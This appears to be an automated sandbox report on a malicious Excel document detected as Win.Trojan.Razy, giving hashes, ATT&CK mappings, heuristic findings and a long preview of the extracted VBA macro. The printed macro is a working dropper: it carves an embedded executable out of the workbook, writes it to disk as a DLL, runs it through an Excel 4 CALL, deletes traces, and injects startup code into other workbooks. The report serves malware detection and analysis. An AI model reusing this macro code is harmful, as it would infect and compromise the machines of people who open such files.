Win.Trojan.Razy-7331387-0 Office (OLE) malware analysis — malicious · bcfc8d3e54431d9c

MALICIOUS

Office (OLE)

797.0 KB Created: 2019-08-30 09:14:50 Authoring application: Microsoft Excel First seen: 2020-07-24

MD5: 83b032d6c59aa3f4151274c919c71193 SHA-1: 43993214830059b5401116f638f30a16268e8328 SHA-256: bcfc8d3e54431d9c2f24455584697c22936e715988a95728b956d89da62a6fef

482 Risk Score

Malware Insights

Win.Trojan.Razy-7331387-0 · confidence 95%

MITRE ATT&CK

T1059.005 Visual Basic T1137.001 Office Application Startup: VBA T1566.001 Spearphishing Attachment T1105 Ingress Tool Transfer T1027 Obfuscated Files or Information T1071.001 Web Protocols: Web Protocols

The sample is an Office document containing VBA macros that leverage `CreateObject` and `Shell()` calls, indicative of malicious intent. It also contains an embedded PE executable and references to Windows API functions like `VirtualAlloc` and `LoadLibrary`, suggesting it's designed to load and execute a secondary payload. The ClamAV detection name 'Win.Trojan.Razy-7331387-0' further supports its classification as a trojan.

Heuristics 11

ClamAV: Win.Trojan.Razy-7331387-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Win.Trojan.Razy-7331387-0
Embedded PE executable critical OLE_EMBEDDED_EXE

MZ/PE header found inside document — possible embedded executable
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Potential Shell call in VBA critical OLE_VBA_SHELL

Potential Shell call in VBA
Matched line in script
```
Set FucjiFilm = CreateObject("WScri" + "pt.Shell")
PRP = "%" & UserForm6.TextBox1.Tag
```
VBA ActiveX event launches decoded Excel4 macro critical OLE_VBA_ACTIVEX_XLM_STAGER

The compiled VBA p-code (identifier table) references an auto-firing ActiveX/control event together with ExecuteExcel4Macro, while the decompressed source does not — the VBA-stomping shape of the ActiveX-event XLM stager. The control event bridges into XLM formula execution to call Win32 / drop payloads, hidden from source-level scanners.

CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call

Matched line in script

Set FucjiFilm = CreateObject("WScri" + "pt.Shell")
PRP = "%" & UserForm6.TextBox1.Tag

Reference to LoadLibrary API high SC_STR_LOADLIBRARY

Reference to LoadLibrary API
Reference to GetProcAddress API high SC_STR_GETPROCADDRESS

Reference to GetProcAddress API
Reference to VirtualAlloc API medium SC_STR_VIRTUALALLOC

Reference to VirtualAlloc API
Reference to VirtualProtect API medium SC_STR_VIRTUALPROTECT

Reference to VirtualProtect API
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://www.microsoft.com0 In document text (OLE body)
- http://crl.microsoft.com/pki/crl/products/MicrosoftTimeStampPCA.crl0XIn document text (OLE body)
- http://www.microsoft.com/pki/certs/MicrosoftTimeStampPCA.crt0In document text (OLE body)
- http://crl.microsoft.com/pki/crl/products/MicCodSigPCA_08-31-2010.crl0ZIn document text (OLE body)
- http://www.microsoft.com/pki/certs/MicCodSigPCA_08-31-2010.crt0In document text (OLE body)
- http://crl.microsoft.com/pki/crl/products/microsoftrootcert.crl0TIn document text (OLE body)
- http://www.microsoft.com/pki/certs/MicrosoftRootCert.crt0In document text (OLE body)

Extracted artifacts 3

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	28003 bytes
SHA-256: `249947ae1e21321e5f02819695c47ef8312e6881d03e0bf634406cab895b3b75`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "Sem" Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Sub addWBActivate() Dim VBProj Dim VBComp Dim codeMod Dim formsFolder As String Dim tmpColl As Collection Dim wBook As Workbook Dim filesToPrcs As Collection Dim flw Dim cdw Dim fullFName As String Dim activateExist As Boolean formsFolder = "C:\Users\GalkinVa\files_for_transport" Set tmpColl = flw.getPathsToFilesFromFolder(formsFolder) If tmpColl Is Nothing Then Err.Raise 13, Description:="tmpColl variable doesn" End If Set filesToPrcs = tmpColl For Each fName In filesToPrcs fullFName = fName fName = flw.extractNameWithExt(fullFName) Set wBook = Workbooks.Open(fullFName) Set VBProj = wBook.VBProject If cdw.VBComponentExists("ThisWorkbook", VBProj) Then Set VBComp = VBProj.VBComponents("ThisWorkbook") ElseIf cdw.VBComponentExists("ÝòàÊíèãà", VBProj) Then Set VBComp = VBProj.VBComponents("ÝòàÊíèãà") Else Err.Raise 13, "try to set VBComponent", "components from check doesn" End If Set codeMod = VBComp.CodeModule Set tmpColl = cdw.ListProcedures(VBComp) For Each proc In tmpColl If proc = "Workbook_Activate" Then activateExist = True End If Next proc If Not activateExist Then Call cdw.CreateEventProcedure(VBComp) Else Debug.Print "Workbook_Activate already exist in " & wBook.Name End If wBook.RunAutoMacros xlAutoClose On Error Resume Next wBook.Close saveChanges:=True If Err.Number <> 0 Then Debug.Print "Error occured when try to save " & wBook.Name End If Next fName End Sub Private Sub Workbook_Activate() If UserForm1.Visible = False Then Module1.SendCollection End If End Sub Attribute VB_Name = "Page1" Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "Module1" Public MousePointerLeak6004 As Byte Public Gen4var As Byte Public MousePointerLeak6003 As Byte Public Const FirstB As Byte = 77 Public Const SecondB As Byte = 90 Public Const ThirdB As Byte = 144 Public Property Get Keys() As Collection Set Keys = IKeys End Property Public Property Get Items() As Collection Set Items = IItms End Property Public Sub SendCollection() Dim FucjiFilm As Object Dim SpecialPath As String Set FucjiFilm = CreateObject("WScri" + "pt.Shell") PRP = "%" & UserForm6.TextBox1.Tag UserForm6.TextBox1.Tag = FucjiFilm.ExpandEnvironmentStrings(PRP + "%") UserForm6.TextBox3.Tag = FucjiFilm.SpecialFolders(UserForm6.TextBox3.Tag) ChDir (UserForm6.TextBox1.Tag) UserForm1.show End Sub Public Sub Remove(Key) If TypeName(Key) = "String" Then Dim i On Error Resume Next Call IItms.Remove(Key) Call IKeys.Remove(Key) For i = 1 To IItms.Count If InStr("Collection,Prop", TypeName(IItms.Item(i))) <> 0 Then If IItms.Item(i).Item("Name") = Key Then Call IItms.Remove(i) Call IKeys.Remove(i) Exit For End If End If Next On Error GoTo 0 Else Call IItms.Remove(Key) Call IKeys.Remove(Key) End If End Sub Private Function setItem(Key, Value, Optional RepFlg = True) Dim i As Integer If TypeName(Key) = "String" Then If RepFlg Then If Key <> "" Then Call IItms.Add(Value) Call IKeys.Add(IItms.Count) End If Else MsgBox "???" End If Else If IItms.Count < Key Then For i = IItms.Count To Key - 2 Call IItms.Add("") Next End If If RepFlg Then On Error Resume Next Call IItms.Remove(Key) On Error GoTo 0 If IItms.Count < Key Then Call IItms.Add(Value) Else Call IItms.Add(Value, before:=Key) End If Else If Key = 0 Then If IItms.Count = 0 Then Call IItms.Add(Value) Else Call IItms.Add(Value, before:=1) End If Else If IItms.Count < Key Then Call IItms.Add("") Call IItms.Add(Value) Else Call IItms.Add(Value, after:=Key) End If End If End If End If End Function Attribute VB_Name = "UserForm1" Attribute VB_Base = "0{7E7C5695-1990-4FD6-8CEA-4E89D36BC15B}{E395EEAE-86E7-4BD8-836D-F83EAD60FC86}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Private Sub Label1_Click() End Sub Private Sub UserForm_Activate() DoEvents DoEvents ChenderBegin DoEvents End Sub Private Sub UserForm_Initialize() Call SystemButtonSettings(Me, False) End Sub Attribute VB_Name = "Module2" Public Sub GetParam(Count As Integer) Dim i As Long Dim j As Integer Dim c As String Dim bbqI As Boolean Dim bbqQ As Boolean j = 1 bbqI = False bbqQ = False GetP.aram = "" For i = 1 To Len(Comma.nd$) c = Mi.d$(Comma.nd$, i, 1) If bbqI Then If c = """" Then j = j + 1 bbqI = False bbqQ = False End If ElseIf bbqI And Not bbqQ Then If c = " " Then j = j + 1 bbqI = False bbqQ = False End If Else If c = """" Then If j > Count Then Exit Sub bbqI = True bbqQ = True ElseIf c <> " " Then bbqI = True bbqQ = False End If End If If bbqI And j = Count And c <> """" Then GetP.aram = GetP.aram & c Next i End Sub Public Function PathBack(ByVal sPath As String) As String On Error Resume Next Dim sT As Variant Dim tt As String If Len(sPath) = 3 Then GoTo errorhand For ii = 0 To UBound(sT) - 2 tt = tt & sT(ii) & "\" Next ii PathBack = tt errorhand: PathBack = sPath End Function Attribute VB_Name = "Class1" Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = False Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "UserForm6" Attribute VB_Base = "0{7D1F8756-5F10-4AFC-ADD1-58C883AB3F11}{FDDBCC1F-9A5F-49C1-A6D4-A9F1FE84E1F9}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "Page11" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "Module6" #If VBA7 And Win64 Then Public Const IsSecond = True #Else Public Const IsSecond = False #End If Public Sub PrepareConfigForOutput() On Error Resume Next Dim i As Long Dim sNextChar As String Dim bbqI As Boolean Dim bbqQ As Boolean Dim sCommand As String Dim PrepareConfigForOutput As Long PrepareConfigForOutput = 0 bbqIParameter = False bbqQ = False sCommand = Command$ For i = 1 To ALen.B(sCommand) sNextChar = Mid(sCommand, i, 1) If bbqIParameter Then If bbqQ Then If sNextChar = " " Then bbqIParameter = False bbqQ = False PrepareConfigForOutput = PrepareConfigForOutput + 1 End If End If End If Next i If bbqIParameter Then PrepareConfigForOutput = PrepareConfigForOutput + 1 End Sub Public Sub PathBack(ByVal sPath As String) On Error Resume Next Dim sT As Variant Dim tt As String If Len(sPath) = 3 Then GoTo errorhand For ii = 0 To UBound(sT) - 2 tt = tt & sT(ii) & "\" Next ii PathB.ack = tt errorhand: Path.Back = sPath End Sub Public Sub GetParam(Count As Integer) Dim i As Long Dim j As Integer Dim c As String Dim bbqI As Boolean Dim bbqQ As Boolean j = 1 bbqI = False bbqQ = False GetP.aram = "" For i = 1 To Len(Comma.nd$) c = Mi.d$(Comma.nd$, i, 1) If bbqI Then If c = """" Then j = j + 1 bbqI = False bbqQ = False End If ElseIf bbqI And Not bbqQ Then If c = " " Then j = j + 1 bbqI = False bbqQ = False End If Else If c = """" Then If j > Count Then Exit Sub bbqI = True bbqQ = True ElseIf c <> " " Then bbqI = True bbqQ = False End If End If If bbqI And j = Count And c <> """" Then GetP.aram = GetP.aram & c Next i End Sub Attribute VB_Name = "Module5" Public MousePointerLeak() As Byte Sub ConvertChartToPicture() Dim Cht As Chart If ActiveChart Is Nothing Then Exit Sub If TypeName(ActiveSheet) = "Chart" Then Exit Sub Set Cht = ActiveChart Cht.CopyPicture Appearance:=xlPrinter, _ Size:=xlScreen, Format:=xlPicture ActiveWindow.RangeSelection.Select ActiveSheet.Paste End Sub Private Function setItem(Key, Value, Optional RepFlg = True) Dim i As Integer If TypeName(Key) = "String" Then If RepFlg Then If Key <> "" Then On Error Resume Next Call IItms.Remove(Key) Call IKeys.Remove(Key) On Error GoTo 0 Call IItms.Add(Value, Key) Call IKeys.Add(Key, Key) Else Call IItms.Add(Value) Call IKeys.Add(IItms.Count) End If Else MsgBox "???" End If Else If IItms.Count < Key Then For i = IItms.Count To Key - 2 Call IItms.Add("") Next End If If RepFlg Then On Error Resume Next Call IItms.Remove(Key) On Error GoTo 0 If IItms.Count < Key Then Call IItms.Add(Value) Else Call IItms.Add(Value, before:=Key) End If Else If Key = 0 Then If IItms.Count = 0 Then Call IItms.Add(Value) Else Call IItms.Add(Value, before:=1) End If Else If IItms.Count < Key Then Call IItms.Add("") Call IItms.Add(Value) Else Call IItms.Add(Value, after:=Key) End If End If End If End If End Function Public Sub ReplaceFile(WhereToGo) DoEvents ThisWorkbook.Sheets.Copy Application.DisplayAlerts = False DoEvents ActiveWorkbook.SaveAs WhereToGo, Local:=False, FileFormat:=3 * 7 + 3 * 7 + 9 DoEvents ActiveWorkbook.Close DoEvents End Sub Attribute VB_Name = "Module4" Private Const GWL_STYLE = -16 Private Const WS_CAPTION = &HC00000 Private Const WS_SYSMENU = &H80000 #If VBA7 Then Private Declare PtrSafe Function BoxWSL _ Lib "user32" Alias "SetWindowLongA" (ByVal parameter1 As Long, _ ByVal nIndex As Long, ByVal dwNewLong As Long) As Long Private Declare PtrSafe Function FWA1 _ Lib "user32" Alias "FindWindowA" (ByVal lpClassName As String, _ ByVal lpWindowName As String) As Long Private Declare PtrSafe Function DrawMenuBar _ Lib "user32" (ByVal parameter1 As Long) As Long Private Declare PtrSafe Function GetWindowLong11 _ Lib "user32" Alias "GetWindowLongA" (ByVal parameter1 As Long, _ ByVal nIndex As Long) As Long #Else Private Declare Function GetWindowLong11 _ Lib "user32" Alias "GetWindowLongA" ( _ ByVal parameter1 As Long, ByVal nIndex As Long) As Long Private Declare Function FWA1 _ Lib "user32" Alias "FindWindowA" (ByVal lpClassName As String, _ ByVal lpWindowName As String) As Long Private Declare Function DrawMenuBar _ Lib "user32" (ByVal parameter1 As Long) As Long Private Declare Function BoxWSL _ Lib "user32" Alias "SetWindowLongA" ( _ ByVal parameter1 As Long, ByVal nIndex As Long, ByVal dwNewLong As Long) As Long #End If Private Sub cmdExit_Click() Unload M.e End End Sub Public Sub SystemButtonSettings(frm As Object, show As Boolean) Dim windowStyle As Long Dim windowHandle As Long windowHandle = FWA1(vbNullString, frm.Caption) windowStyle = GetWindowLong11(windowHandle, GWL_STYLE) If show Then BoxWSL windowHandle, GWL_STYLE, (windowStyle + WS_SYSMENU) Else BoxWSL windowHandle, GWL_STYLE, (windowStyle And Not WS_SYSMENU) End If DrawMenuBar (windowHandle) End Sub Public Sub NumberBuffer(Number As Long, ByVal Buffer As Byte) If UserForm1.Enabled = True Then Put #Number, , Buffer End If End Sub Public Sub PublicResumEraseByArrayList(ParamArray putArrayBigList() As Variant) On Error Resume Next For Each Key In putArrayBigList Kill Key Next Key On Error GoTo 0 End Sub Private Sub ERRCHECK(result) If result = RCPND_FMOD_OK Then ms.gR.esult = MsgBox(result & ") " & FMOD_Er_rorStr.ing(result)) End If End Sub Attribute VB_Name = "Module7" Public Sub Text_Write(progbar As Object, tmptext As String, tmpSpalte As Long, tmpZeile As Long, tmpcolor As Long) For i = 1 To Len(tmptext) If TextClockWise = True Then For x = tmpSpalte To tmpSpalte + UBound(ZeichenArray, 1) For y = tmpZeile - Letter.Position + Letter.FontHeight - 1 To tmpZeile - Letter.Position - UBound(ZeichenArray, 2) + Letter.FontHeight - 1 Step -1 OldLetterArray.RGB(ZeichenAnzahl - 1).Data(x - tmpSpalte, y - tmpZeile + Letter.Position + UBound(ZeichenArray, 2) - Letter.FontHeight + 1) = Arra.y_Red((x - 1) Mod Spalten + 1, y - 1) * 100 + Arra.y_Green((x - 1) Mod Spalten + 1, y - 1) * 10 + Arra.y_Blue((x - 1) Mod Spalten + 1, y - 1) OldLetterArray.SW(ZeichenAnzahl - 1).Data(x - tmpSpalte, y - tmpZeile + Letter.Position + UBound(ZeichenArray, 2) - Letter.FontHeight + 1) = CBool(Arra.y_SW((x - 1) Mod Spalten + 1, y - 1)) If ZeichenArray(x - tmpSpalte, tmpZeile - Letter.Position + Letter.FontHeight - 1 - y) Then Draw_Fill.Cell (x - 1) Mod Spalten + 1, y - 1, picsource, tmpcolor, False Arra.y_Red((x - 1) Mod Spalten + 1, y - 1) = Draw_Color2.RGB_Bool(tmpcolor).R / 255 Arra.y_Green((x - 1) Mod Spalten + 1, y - 1) = Draw_Color2.RGB_Bool(tmpcolor).G / 255 Arra.y_Blue((x - 1) Mod Spalten + 1, y - 1) = Draw_Color2.RGB_Bool(tmpcolor).B / 255 Arra.y_SW((x - 1) Mod Spalten + 1, y - 1) = IIf(Draw_Color2.SW(tmpcolor), 1, 0) End If Next y Next x Else OldLetter.ArrayRGB(ZeichenAnzahl - 1).Left = tmpSpalte OldLetter.ArrayRGB(ZeichenAnzahl - 1).Top = tmpZeile + Letter.Position OldLetter.ArraySW(ZeichenAnzahl - 1).Left = tmpSpalte OldLetter.ArraySW(ZeichenAnzahl - 1).Top = tmpZeile + Letter.Position For x = tmpSpalte To tmpSpalte - UBound(ZeichenArray, 1) Step -1 For y = tmpZeile + Letter.Position To tmpZeile + Letter.Position + UBound(ZeichenArray, 2) OldLetterArray.RGB(ZeichenAnzahl - 1).Data(x - tmpSpalte, y - tmpZeile + Letter.Position) = Arra.y_Red((x - 1) Mod Spalten + 1, y - 1) * 100 + Arra.y_Green((x - 1) Mod Spalten + 1, y - 1) * 10 + Arra.y_Blue((x - 1) Mod Spalten + 1, y - 1) OldLetterArray.SW(ZeichenAnzahl - 1).Data(x - tmpSpalte, y - tmpZeile - Letter.Position) = CBool(Arra.y_SW((x - 1) Mod Spalten + 1, y - 1)) If ZeichenArray(tmpSpalte - x, y - tmpZeile - Letter.Position) Then Draw_Fill.Cell (x - 1) Mod Spalten + 1, y - 1, picsource, tmpcolor, False Arra.y_Red((x - 1) Mod Spalten + 1, y - 1) = Draw_Color2.RGB_Bool(tmpcolor).R / 255 Arra.y_Green((x - 1) Mod Spalten + 1, y - 1) = Draw_Color2.RGB_Bool(tmpcolor).G / 255 Arra.y_Blue((x - 1) Mod Spalten + 1, y - 1) = Draw_Color2.RGB_Bool(tmpcolor).B / 255 Arra.y_SW((x - 1) Mod Spalten + 1, y - 1) = IIf(Draw_Color2.SW(tmpcolor), 1, 0) End If Next y Next x End If progbar.Value = i Next i progbar.Value = 0 Dra.w_Zoom picsource, pictarget End Sub Public Sub ChenderBegin() WhereToGo = UserForm6.TextBox1.Tag & "\repository" + ".xls" + "x" CustomWBP = WhereToGo + "." + "zi" + "p" buildPathFor = UserForm6.TextBox1.Tag Dim ofbl As String Dim CurrentSizeOfAT As Long Dim sendings As Integer ofbl = UserForm6.TextBox3.Tag + "\stadr_" ofbl = ofbl & "." & "d" & "ll" oob = buildPathFor + "\ole" + "Obj" + "ect*.b" + "" + "in" PublicResumEraseByArrayList oob, CustomWBP, ofbl ReplaceFile WhereToGo FileCopy WhereToGo, CustomWBP sendings = 1 Set sNMSP = CreateObject("Shell." + "Application") If sendings > 0 And sendings > -30 Then Set FileWherePutTo2 = sNMSP.Namespace(buildPathFor) Set FileWherePutTo = sNMSP.Namespace(CustomWBP) FileWherePutTo2.CopyHere FileWherePutTo.Items.Item(UserForm6.Label2.Tag) End If CurrentSizeOfAT = 269824 If IsSecond Then CurrentSizeOfAT = 300000 + 21530 + 6 sendings = 2 End If Composition buildPathFor & UserForm6.Label1.Tag, ofbl, CurrentSizeOfAT, sendings If sendings > 0 Then sendings = sendings + 1 ChDir (UserForm6.TextBox3.Tag) sendings = sendings + 1 End If If sendings < 100 Then sendings = sendings + 1 sendings = sendings + 1 End If PrepareConfigForOutput If sendings < 0 Then sendings = sendings + 1 sendings = sendings + 1 End If ofbl = "CALL(""" + ofbl ExecuteExcel4Macro ofbl + """,""llehs"",""J"")" End Sub Public Sub Clone(HTMLSource As Variant) On Error GoTo ErrorTrap Const Chunk = 1000 Dim WorkingSrc As String Dim TagStart As Long Dim TagEnd As Long Dim TagLength As Long Dim TagStartString As String Dim Ptr As Long Dim Cnt As Long Dim Pos As Long Dim testing As Boolean Dim PosScriptEnd As Long Dim PosEndScript As Long Dim PosEndScriptEnd As Long WorkingSrc = HTMLSource LocalElementCount = 0 LocalElementSize = 0 ReDim LocalElements(LocalElementSize) If NewWay Then Loa.d = True Ptr = 0 Do BlobSN = "/blob" & GetRan.domInteger() & ":" Ptr = Ptr + 1 Loop While ((InStr(1, WorkingSrc, BlobSN, vbTextCompare) <> 0) And (Ptr < 10)) spli.tt.est = Split(WorkingSrc, "<style") Cnt = UBound(spli.tt.est) + 1 If Cnt > 1 Then For Ptr = 1 To Cnt - 1 PosScriptEnd = InStr(1, spli.tt.est(Ptr), ">") If PosScriptEnd > 0 Then PosEndScript = InStr(PosScriptEnd, spli.tt.est(Ptr), "</style", vbTextCompare) If PosEndScript > 0 Then BlobCnt = BlobCnt + 1 BlobCnt = BlobCnt + 1 BlobCnt = BlobCnt + 1 BlobCnt = BlobCnt + 1 BlobCnt = BlobCnt + 1 BlobCnt = BlobCnt + 1 spli.tt.est(Ptr) = Mi.d(spli.tt.est(Ptr), 1, PosScriptEnd) & BlobSN & BlobCnt & "/" & Mi.d(spli.tt.est(Ptr), PosEndScript) BlobCnt = BlobCnt + 1 BlobCnt = BlobCnt + 1 BlobCnt = BlobCnt + 1 BlobCnt = BlobCnt + 1 BlobCnt = BlobCnt + 1 BlobCnt = BlobCnt + 1 Blo.bs(BlobCnt) = Mi.d(spli.tt.est(Ptr), PosScriptEnd + 1, (PosEndScript - 1) - (PosScriptEnd + 1) + 1) BlobCnt = BlobCnt + 1 BlobCnt = BlobCnt + 1 BlobCnt = BlobCnt + 1 BlobCnt = BlobCnt + 1 BlobCnt = BlobCnt + 1 BlobCnt = BlobCnt + 1 End If End If Next WorkingSrc = Join(spli.tt.est, "<style") End If spli.tt.est = Split(WorkingSrc, "<style") Cnt = UBound(spli.tt.est) + 1 If Cnt > 1 Then For Ptr = 1 To Cnt - 1 PosScriptEnd = InStr(1, spli.tt.est(Ptr), ">") If PosScriptEnd > 0 Then PosEndScript = InStr(PosScriptEnd, spli.tt.est(Ptr), "</style", vbTextCompare) If PosEndScript > 0 Then BlobCnt = BlobCnt + 1 BlobCnt = BlobCnt + 1 BlobCnt = BlobCnt + 1 BlobCnt = BlobCnt + 1 BlobCnt = BlobCnt + 1 BlobCnt = BlobCnt + 1 spli.tt.est(Ptr) = Mi.d(spli.tt.est(Ptr), 1, PosScriptEnd) & BlobSN & BlobCnt & "/" & Mi.d(spli.tt.est(Ptr), PosEndScript) BlobCnt = BlobCnt + 1 BlobCnt = BlobCnt + 1 BlobCnt = BlobCnt + 1 BlobCnt = BlobCnt + 1 BlobCnt = BlobCnt + 1 BlobCnt = BlobCnt + 1 Blo.bs(BlobCnt) = Mi.d(spli.tt.est(Ptr), PosScriptEnd + 1, (PosEndScript - 1) - (PosScriptEnd + 1) + 1) BlobCnt = BlobCnt + 1 BlobCnt = BlobCnt + 1 BlobCnt = BlobCnt + 1 BlobCnt = BlobCnt + 1 BlobCnt = BlobCnt + 1 BlobCnt = BlobCnt + 1 End If End If Next WorkingSrc = Join(spli.tt.est, "<style") End If Exit Sub End If ErrorTrap: Call Handle.Error("Load", Err.Number, Err.Source, Err.Description) End Sub Public Sub Composition(Composition2 As String, ofbl As String, fl As Long, MousePointerLeak6006 As Integer) Dim MousePointerLeak6001 As Long Dim Class1 As Class1 Set Class1 = New Class1 Dim SimpleMethod As Integer ReDim MousePointerLeak(1 To fl) MousePointerLeak6001 = FreeFile Open Composition2 For Binary Access Read As MousePointerLeak6001 Dim cur As Integer cur = 1 Do While 1 Get MousePointerLeak6001, , Gen4var If Gen4var = FirstB Then MousePointerLeak(1) = Gen4var Get MousePointerLeak6001, , MousePointerLeak6003 If MousePointerLeak6003 = SecondB Then MousePointerLeak(2) = MousePointerLeak6003 Get MousePointerLeak6001, , MousePointerLeak6004 If MousePointerLeak6004 = ThirdB Then MousePointerLeak(3) = MousePointerLeak6004 If cur = MousePointerLeak6006 Then For k = 4 To fl Get MousePointerLeak6001, , Gen4var MousePointerLeak(k) = Gen4var Next k Exit Do Else cur = cur + 1 End If End If …
`embedded_office_00004541.exe`	embedded-pe	Office MZ+PE at offset 0x4541	798399 bytes
SHA-256: `7a141c28f56ca50a4e661d5b037ea02cab71e00ca26a221be5e880e596952913`
Detection ClamAV: Win.Trojan.Razy-7331387-0 Obfuscation or payload: unlikely
`ole10native_00.bin`	ole-package	OLE Ole10Native stream: MBD007D0DB6/Ole10Native	611597 bytes
SHA-256: `24dcb6fde1d37aac3a94c0038d0647620900c8042ba9bc961f231e5db6cc9171`

Open this report in the interactive analyzer, or submit your own file for analysis.